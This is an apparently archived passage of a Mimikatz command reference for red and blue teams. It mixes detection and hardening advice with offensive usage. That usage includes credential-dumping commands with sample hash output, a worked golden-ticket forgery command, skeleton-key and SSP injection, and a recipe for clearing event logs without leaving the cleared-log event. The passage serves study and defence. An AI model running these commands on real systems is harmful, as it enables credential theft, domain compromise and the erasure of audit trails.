Mimikatz Published: 2015-09-20 · Archived: 2026-04-05 20:10:11 UTC Unofficial Guide to Mimikatz & Command Reference Mimikatz Command Reference Version: mimikatz 2.1.1 (x64) built on Nov 28 2017 Page last updated: February 17th, 2018 THIS PAGE IS ARCHIVED AND NO LONGER BEING UPDATED Check out  The Mimikatz Missing Manual. Introduction: It seems like many people on both sides of the fence, Red & Blue, aren’t familiar with most of Mimikatz’s capabilities, so I put together this information on all the available commands I could find. I plan to update as I can with additional content about the most useful commands. This way both Red & Blue teams better understand the full capability and are better able to secure the enterprises they are hired to protect. I developed this reference after speaking with a lot of people, hired to both defend and attack networks, I learned that outside of a few of the mot frequently used Mimikatz commands, not many knew about the full capability of Mimikatz. This page details as best as possible what each command is, how it works, the rights required to run it, the parameters (required & optional), as well as screenshots and additional context (where possible). There are several I haven’t delved fully into, but expect to in the near future. While I will continue to post articles to ADSecurity.org about different aspects of Mimikatz usage, I plan to keep this as updated and as comprehensive as possible. With that noted, this page will never be as up-to-date as the Mimikatz github. The best Mimikatz documentation is the source code.  This information is provided to help organizations better understand Mimikatz capability and is not to be used for unlawful activity. Do NOT use Mimikatz on computers you don’t own or have been allowed/approved to. In other words, don’t pen-test/red-team systems with Mimikatz without a “get out of jail free card”. This page and all content contained within is not to be reproduced in whole or part without express written consent by this page’s author. I did not write Mimikatz and therefore have no special insight. All of the information on this page is derived from https://adsecurity.org/?page_id=1821 Page 1 of 79 using Mimikatz, reading the source code, conversations with Benjamin, his Twitter, blog & GitHub pages, and my own work/research. Any errors on this page are my own only. Send comments/kudus here. Many thanks to Benjamin Delpy for writing and continuously updating Mimikatz. His work has greatly improved the security of Windows, especially Windows 10. Mimikatz Overview: Mimikatz is one of the best tools to gather credential data from Windows systems. In fact I consider Mimikatz to be the “Swiss army knife” (or multi-tool) of Windows credentials – that one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French most of the resources describing Mimikatz usage is in French, at least on his blog. The Mimikatz GitHub repository is in English and includes useful information on command usage. Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested). The Mimikatz.exe contains, or at least should contain, all capability noted there. Mimikatz capability can be leveraged by compiling and running your own version, running the Mimikatz executable, leveraging the MetaSploit script, the official Invoke-Mimikatz PowerShell version, or one of the dozen of Mimikatz PowerShell variants (I happen to be partial to PowerShell Empire, because Empire is awesome!). The Mimikatz source code and release binaries are available on GitHub and is licensed under Creative Commons with the following detail: You are free to: *  Share — copy and redistribute the material in any medium or format *  Adapt — remix, transform, and build upon the material *  for any purpose, even commercially. The licensor cannot revoke these freedoms as long as you follow the license terms. Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits. Mimikatz Author(s): Benjamin DELPY gentilkiwi , you can contact him on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com ) DCSync function in lsadump module was co-written with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com ) https://adsecurity.org/?page_id=1821 Page 2 of 79 “Official” Mimikatz Links: Mimikatz GitHub Location (Source Code) Mimikatz Releases (includes binaries) Mimikatz GitHub Wiki (Documentation, some of which is reproduced here) GentilKiwi Blog (much of it is in French, use Chrome/other for translation) Mimikatz & Credentials: After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service, LSASS, process in memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn’t prompted each time resource access is requested. The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is <15 characters, depending on Windows OS version and patch level), and even clear-text passwords (to support WDigest and SSP authentication among others. While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), this doesn’t prevent the system from generating the LM hash in memory. By default, Windows Server 2008 and Windows Vista no longer generate LM hashes for users unless explicitly enabled. Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory. This functionality was also “back-ported” to earlier versions of Windows (Windows 7/8/2008R2/2012) in kb2871997, though in order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled): HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD) This registry key is worth monitoring in your environment since an attacker may wish to set it to 1 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem. https://adsecurity.org/?page_id=1821 Page 3 of 79 Note that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously updated with new capability to be run remotely. This include running Mimikatz remotely against a remote system to dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and DCSync, the latest feature to grab password data for any Active Directory account in the domain remotely against a DC without any Mimikatz code being run on the DC (it uses Microsoft’s Domain Controller official replication APIs, once the correct rights are attained). Available Credentials by OS: Benjamin Delpy posted an Excel chart on OneDrive (no longer available, but shown below) that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory. (Click image to embiggen) PowerShell & Mimikatz: The majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework) through the “Invoke-Mimikatz” PowerShell script (written by Joseph Bialek) which “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.” Note that the PowerSploit framework is now hosted in the “PowerShellMafia” GitHub repository. What gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or intranet server), and executed from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system. Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit & 64bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date. Use mimikatz to dump credentials out of LSASS:  Invoke-Mimikatz -DumpCreds Use mimikatz to export all private certificates (even if they are marked non-exportable): Invoke-Mimikatz – DumpCerts https://adsecurity.org/?page_id=1821 Page 4 of 79 Elevate privilege to have debug rights on remote computer: Invoke-Mimikatz -Command “privilege::debug exit” -ComputerName “computer1” The Invoke-Mimikatz “Command” parameter enables Invoke-Mimikatz to run custom Mimikatz commands. Defenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz. Detecting Mimikatz: There are several ways to potentially detect Mimikatz use on a network, though none are guaranteed. Since Mimikatz’s source code is on GitHub, anyone with Visual Studio can compile their own version. I built my own version of Mimikatz called “kitikatz” by replacing all instances of “mimikatz” with “kitikatz” and the detection rate at VirusTotal was not good (4/54). Windows Defender on my Windows 10 system detected it.  I then replaced “Benjamin Delpy” and “gentilkiwi” with the same words, just replacing the e’s with 3’s and the i’s with 1’s. The detection rate was still poor (4/54). Windows Defender on my Windows 10 system did not detect it. So, your mileage will vary regarding detection. While VirusTotal is not the best method to determine AV detection, it is a relatively simple method to get some basic numbers. Benjamin Delpy publishes YARA rules for Mimikatz on the Mimkatz GitHub repository. Run AntiVirus software with the latest definition files. According to VirusTotal, the mimikatz.exe dated 11/11/2015 (32bit & 64bit) is detected by 35/35 of the AV engines. Renaming the file doesn’t change the scan results. Note that Benjamin has noted real-world results to be less successful. However, AV will usually flag the known bad files. AntiVirus is part of foundational security – the first layer in “defense in depth”. Mimikatz (as of October) activates attached BusyLights. [implemented in Mimikatz version 2.0 alpha 20151008 (oe.eo) edition] Leverage security software to identify processes that interact with LSASS. Security software that monitors for process injection may also be able to regularly detect Mimikatz use. HoneyTokens/HoneyHashes involves placing special credentials in memory on a number of computers in the enterprise. These credentials are flagged so when anyone attempts to use them, a critical alert goes out. this requires some sort of push method as well as placing credentials that are attractive to an attacker. In theory, this could detect credential theft and use in the environment. If the WDIGEST registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest) is supposed to be set to “0” in the enterprise to prevent “clear-text” passwords from being stored in LSASS and there are systems where it was switched to “1”, this may be indicative of credential theft activity. This registry key is worth monitoring in your environment since an attacker may wish to set it to 0 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2 (probably 2016 as well). Forged Kerberos ticket detection is covered on this page I published in early 2015. These methods can detect Golden Tickets, Silver Tickets, and Trust Tickets. I also have information on how to detect MS14- 068 Kerberos vulnerability exploitation. Enable LSA Protection on all Windows versions in the enterprise that supports it. This prevents Mimikatz from working “out-of-the-box” and requires use of the Mimikatz driver which logs events when it interacts https://adsecurity.org/?page_id=1821 Page 5 of 79 with LSASS. There are new/updated events starting with Windows 10 and Windows Server 2016 to potentially detect Mimikatz use: Added a default process SACL to LSASS.exe In Windows 10, a default process SACL was added to LSASS.exe to log processes attempting to access LSASS.exe. The SACL is L”S:(AU;SAFA;0x0010;;;WD)”. You can enable this under Advanced Audit Policy Configuration\Object Access\Audit Kernel Object. This can help identify attacks that steal credentials from the memory of a process. Mimikatz & LSA Protection: Windows Server 2012 R2 and Windows 8.1 includes a new feature called LSA Protection which involves enabling LSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass with a driver, but that should make some noise in the event logs): The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. Enabling LSA protection: 1. Open the Registry Editor (RegEdit.exe), and navigate to the registry key that is located at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and Set the value of the registry key to: “RunAsPPL”=dword:00000001. 2. Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In the Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to SYSTEM\CurrentControlSet\Control\Lsa.  In the Value name box, type RunAsPPL. In the Value type box, click the REG_DWORD. In the Value data box, type 00000001.Click OK. LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver (“!+”). Detecting Invoke-Mimikatz: https://adsecurity.org/?page_id=1821 Page 6 of 79 Ensure all Windows systems have PowerShell v3 or newer. Newer versions of PowerShell have better logging features, especially PowerShell v5. Enable PowerShell Module Logging via Group Policy: Computer Configuration, Policies, Administrative Templates, Windows Components, and Windows PowerShell,Turn on Module Logging. Enter “*” and click OK. This will log all PowerShell activity including all PowerShell modules. PowerShell activity will be logged to the PowerShell Operational Log. Push or pull these events to a central logging server (via Windows Event Forwarding or similar) or SIEM. Parse PowerShell events for the following: “System.Reflection.AssemblyName” “System.Reflection.Emit.AssemblyBuilderAccess “ “System.Runtime.InteropServices.MarshalAsAttribute” “TOKEN_PRIVILEGES”  “SE_PRIVILEGE_ENABLED“ Note: While it may be possible to identify Mimikatz usage by alerting on “mimikatz”, “Delpy”, or “gentilkiwi”, a “sophisticated” attacker will likely roll their own version of Mimikatz or Invoke-Mimikatz without these keywords. Detecting Offensive PowerShell Tools: Many PowerShell offensive tools use the following calls which are logged in PowerShell Module Logging. “GetDelegateForFunctionPointer” “System.Reflection.AssemblyName“ “System.Reflection.Emit.AssemblyBuilderAccess“ “System.Management.Automation.WindowsErrorReporting” “MiniDumpWriteDump” “TOKEN_IMPERSONATE” “TOKEN_DUPLICATE” “TOKEN_ADJUST_PRIVILEGES” https://adsecurity.org/?page_id=1821 Page 7 of 79 “TOKEN_PRIVILEGES” “Sneaky” Mimikatz Execution: Casey Smith (@subtee & blog) has done a LOT of work showing how application whitelisting is not the panacea many believe it to be. Despite that, application whitelisting is a solid layer in a defense in depth strategy. Casey also has come up with many creative and sneaky ways to execute Mimikatz. Execute Mimikatz Inside of RegSvcs or RegAsm – .NET utilities Proof of Concept Mimikatz packed & hidden in an image file Downloads and Executes Mimikatz In Memory From GitHub Note: Subtee has discontinued his GitHub repo, so these links no longer work and have been removed. Most Popular Mimikatz Commands: Here are just some of the most popular Mimikatz command and related functionality. CRYPTO::Certificates – list/export certificates KERBEROS::Golden – create golden/silver/trust tickets KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”. KERBEROS::PTT – pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust). LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account). No need to run code on DC. LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt” LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer. LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest). MISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016. MISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials. MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password. PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands). SEKURLSA::Ekeys – list Kerberos encryption keys https://adsecurity.org/?page_id=1821 Page 8 of 79 SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account) SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials. SEKURLSA::Pth – Pass- theHash and Over-Pass-the-Hash SEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users). TOKEN::List – list all tokens of the system TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box TOKEN::Elevate /domainadmin – impersonate a token with Domain Admin credentials. ADSecurity Mimikatz Posts: All posts mentioning Mimikatz: ADSecurity.org Mimikatz Posts Mimikatz and Active Directory Kerberos Attacks Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync How Attackers Use Kerberos Silver Tickets to Exploit Systems Mimikatz DCSync Usage, Exploitation, and Detection Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP) Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM) Kerberos Golden Tickets are Now More Golden It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts Detecting Mimikatz Use Mimikatz Command Guide: Mimikatz can be executed in interactive mode by simply running “Mimikatz.exe” or pass it a command and exit (example: ‘Mimikatz “kerberos::list” exit’). Invoke-Mimikatz does not have an interactive mode. Mimikatz can be used to pass commands from the command line to Mimikatz for processing in order which is useful for Invoke-Mimikatz or when using Mimikatz in scripts. Appending “exit” exits Mimikatz after the last command is executed (do this so Mimikatz exits gracefully). PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) https://adsecurity.org/?page_id=1821 Page 9 of 79 '## v ##' http://blog.gentilkiwi.com/mimikatz(oe.eo) '#####'with 17 modules * * */ mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # sekurlsa::logonpasswords Authentication Id : 0 ; 646260 (00000000:0009dc74) Session : RemoteInteractive from 2 User Name : adsadministrator Domain : ADSECLAB Logon Server : ADSDC03 Logon Time : 11/27/2015 11:41:27 AM SID : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain : ADSECLAB * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain : LAB.ADSECURITY.ORG * Password : (null) ssp : KO The interactive mode provides a “Mimikatz console” where commands can be entered and executed in real-time: PS C:\temp\mimikatz> .\mimikatz .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) https://adsecurity.org/?page_id=1821 Page 10 of 79 '## v ##' http://blog.gentilkiwi.com/mimikatz(oe.eo) '#####'with 17 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 646260 (00000000:0009dc74) Session : RemoteInteractive from 2 User Name : adsadministrator Domain : ADSECLAB Logon Server : ADSDC03 Logon Time : 11/27/2015 11:41:27 AM SID : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain : ADSECLAB * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain : LAB.ADSECURITY.ORG * Password : (null) ssp : KO credman : Mimikatz Command Reference: Mimikatz Version History Mimikatz Modules: BUSYLIGHT CRYPTO https://adsecurity.org/?page_id=1821 Page 11 of 79 CRYPTO::Certificates DPAPI EVENT IIS KERBEROS Golden Tickets Silver Tickets Trust Tickets KERBEROS::PTT LSADUMP DCSync DCShadow LSADUMP::LSA LSADUMP::NetSync LSADUMP::SAM LSADUMP::Trust MISC MINESWEEPER NET PRIVILEGE PRIVILEGE::Debug PROCESS RPC SERVICE SEKURLSA SEKURLSA::Kerberos SEKURLSA::Krbtgt SEKURLSA::LogonPasswords SEKURLSA::Pth SID STANDARD SYSENV TOKEN TOKEN::Elevate TOKEN::Elevate /domainadmin TS VAULT NOTE: Any item marked “experimental” should only be used in test environments. Version https://adsecurity.org/?page_id=1821 Page 12 of 79 Run Version to get the Mimikatz version and additional information about the Windows system, such as the version and if Credential Manager is running. BUSYLIGHT The BUSYLIGHT Mimikatz module provides additional information for and control of connected BusyLights. BUSYLIGHT::List BUSYLIGHT::Off BUSYLIGHT::Single BUSYLIGHT::Status BUSYLIGHT::Test CRYPTO The CRYPTO Mimikatz module provides advanced capability to interface with Windows cryptographic functions (CryptoAPI). Typical use is to export certificates that aren’t marked as “exportable.” CRYPTO::CAPI– (experimental) Patch CryptoAPI layer for easy export CRYPTO::Certificates – list/export certificates Carlos Perez (aka DarkOperator) has a great blog post on using Mimikatz to export certificates. This command lists certificates and properties of theirs keys. It can export certificates too. Typically requires “privilege::debug” /systemstore – optional – the system store that must be used (default: CERT_SYSTEM_STORE_CURRENT_USER) /store – optional – the store that must be used to list/export certificates (default: My) – full list with crypto::stores /export – optional – export all certificates to files (public parts in DER, private parts in PFX files – password protected with: mimikatz) Benjamin’s comments on CRYPTO:Certificates: CRYPTO::CertToHW – try to export a software CA to a crypto (virtual)hardware CRYPTO::CNG – (experimental) Patch CNG service for easy export (patches “KeyIso” service) CRYPTO::Extract – [experimental] Extract keys from CAPI RSA/AES provider https://adsecurity.org/?page_id=1821 Page 13 of 79 CRYPTO::Hash – hash a password with optional username CRYPTO::Keys– list/export keys containers CRYPTO::Providers – list cryptographic providers CRYPTO::SC – List smartcard readers CRYPTO::SCAuth– Create an authentication certificate (smartcard like) from a CA CRYPTO::Stores – list cryptographic stores /systemstore – optional – the system store that must be used to list stores (default: CERT_SYSTEM_STORE_CURRENT_USER) https://adsecurity.org/?page_id=1821 Page 14 of 79 Store Options: CERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USER CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICY CERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINE CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICY CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISE CERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICE CERT_SYSTEM_STORE_USERS or USERS CERT_SYSTEM_STORE_SERVICES or SERVICES CRYPTO::System – Describe a Windows System Certificate (file, TODO:registry or hive). DPAPI The DPAPI Mimikatz module provides capability to extract Windows stored (and protected) credential data using DPAPI.  DPAPI is the official Windows method to protect (encrypt) local data (usually passwords). Starting with Microsoft® Windows® 2000, the operating system began to provide a data protection application-programming interface (API). This Data Protection API (DPAPI) is a pair of function calls that provide operating system-level data protection services to user and system processes. By operating system-level, we mean a service that is provided by the operating system itself and does not require any additional libraries. By data protection, we mean a service that provides confidentiality of data by using encryption. Because data protection is part of the operating system, every application can now secure data without needing any specific cryptographic code other than the necessary function calls to DPAPI. These calls are two simple functions with various options to modify DPAPI behavior. Overall, DPAPI is an easy-to-use service that will benefit developers who must provide protection for sensitive application data, such as passwords and private keys. DPAPI is a password-based data protection service. It requires a password to provide protection. The drawback, of course, is that all protection provided by DPAPI rests on the password provided. This is offset by DPAPI using proven cryptographic routines, specifically the strong Triple-DES algorithm, and strong keys, which we’ll cover in more detail later. Because DPAPI is focused on providing protection https://adsecurity.org/?page_id=1821 Page 15 of 79 for users and requires a password to provide this protection, it logically uses the user’s logon password for protection. There has been some work done previously regarding attacking DPAPI: Reversing DPAPI and Stealing Windows Secrets Offline DPAPI Secrets. Security analysis and data recovery in DPAPI Benjamin Delpy has an Excel spreadsheet on OneDrive which lists Windows locations that may have stored credentials – view the spreadsheet online. DPAPI::Blob – Unprotect a DPAPI blob with API or Masterkey DPAPI:Cache DPAPI::CAPI – CAPI key test DPAPI::Chrome – Chrome test DPAPI::CNG – CNG key test DPAPI::Cred – CRE test DPAPI::CredHist – Configure a Credhist file DPAPI::MasterKey – Configure a Masterkey file, unprotect (key depending) DPAPI::Protect – Protect data using DPAPI https://adsecurity.org/?page_id=1821 Page 16 of 79 DPAPI::Vault – VAULT test DPAPI::WIFI – WIFI test (XML profile required – reference Ben’s spreadsheet) DPAPI::WWAN – WWAN test (XML profile required – reference Ben’s spreadsheet) EVENT EVENT::Clear – Clear an event log https://adsecurity.org/?page_id=1821 Page 17 of 79 EVENT:::Drop – (experimental) Patch Events service to avoid new events Note: Run privilege::debug then event::drop to patch the event log.  Then run Event::Clear to clear the event log without any log cleared event (1102) being logged. IIS IIS XML Config module IIS::AppHost KERBEROS The KERBEROS Mimikatz module is used to interface with the official Microsoft Kerberos API. No special rights are required for the commands in this module. KERBEROS::Ask – request TGS tickets KERBEROS::Clist – list tickets in MIT/Heimdall ccache KERBEROS::Golden – create golden/silver/trust tickets The capability of this command is based on the password hash type retrieved. Type Requirement Scope https://adsecurity.org/?page_id=1821 Page 18 of 79 Golden KRBTGT hash Domain/Forest Silver Service hash Service Trust Trust hash Domain/Forest -> Domain/Forest (based on account access) Golden Ticket A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign. A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account. To summarize, once an attacker gets access to the KRBTGT password hash, they can create Golden Tickets (TGT) that provide access to anything in AD at any time. Mimikatz Golden Ticket Command Reference: The Mimikatz command to create a golden ticket is “kerberos::golden” /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”. /sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”. /sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1473643419- 774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter. /user – username to impersonate /groups (optional) – group RIDs the user is a member of (the first is the primary group). Add user or computer account RIDs to receive the same access. Default Groups: 513,512,520,518,519 for the well-known Administrator’s groups (listed below). /krbtgt – NTLM password hash for the domain KDC service account (KRBTGT). Used to encrypt and sign the TGT. /ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use. /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use. /id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID). /startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0. /endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes). https://adsecurity.org/?page_id=1821 Page 19 of 79 /renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes). /sids (optional) – set to be the SID of the Enterprise Admins group in the AD forest ([ADRootDomainSID]-519) to spoof Enterprise Admin rights throughout the AD forest (AD admin in every domain in the AD Forest). /aes128 – the AES128 key /aes256 – the AES256 key Golden Ticket Default Groups: Domain Users SID: S-1-5-21-513 Domain Admins SID: S-1-5-21-512 Schema Admins SID: S-1-5-21-518 Enterprise Admins SID: S-1-5-21-519  (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) Group Policy Creator Owners SID: S-1-5-21-520 kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt Command Example: .\mimikatz “kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21- 135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt” exit Golden Ticket References: * Golden Tickets are now More Golden (with SID History) https://adsecurity.org/?page_id=1821 Page 20 of 79 Update1/5/2016: In early January 2015, I shared with customers indicators for detecting forged Kerberos tickets and subsequently presented this information at BSides Charm 2015. Soon after, Mimikatz was updated with a domain field that was set to static values, usually containing the string “eo.oe”. As of the Mimikatz update dated 1/5/2016, forged Kerberos tickets no longer include a domain anomaly since the netbios domain name is placed in the domain component of the Kerberos ticket. Mimikatz code diff: More information on the difficulty of detecting forged Kerberos tickets (Golden Tickets, Silver Tickets, etc) in the in the Detecting Forged Kerberos Tickets section. Silver Ticket A Silver Ticket is a TGS (similar to TGT in format) using the target service account’s (identified by SPN mapping) NTLM password hash to encrypt and sign. The Mimikatz command to create a silver ticket is “kerberos::golden” (yes, you run ‘golden’ to create silver tickets). Mimikatz Silver Ticket Command Reference: /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”. /sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”. /sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1473643419- 774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter. /user – username to impersonate /groups (optional) – group RIDs the user is a member of (the first is the primary group) default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below). /ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use. /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use. /id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID). /startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0. /endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes). /renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes). /aes128 – the AES128 key /aes256 – the AES256 key https://adsecurity.org/?page_id=1821 Page 21 of 79 Silver Ticket Required Parameters: /target – the target server’s FQDN. /service – the kerberos service running on the target server. This is the Service Principal Name class (or type) such as cifs, http, mssql. /rc4 – the NTLM hash for the service (computer account or user account) Silver Ticket Default Groups: Domain Users SID: S-1-5-21-513 Domain Admins SID: S-1-5-21-512 Schema Admins SID: 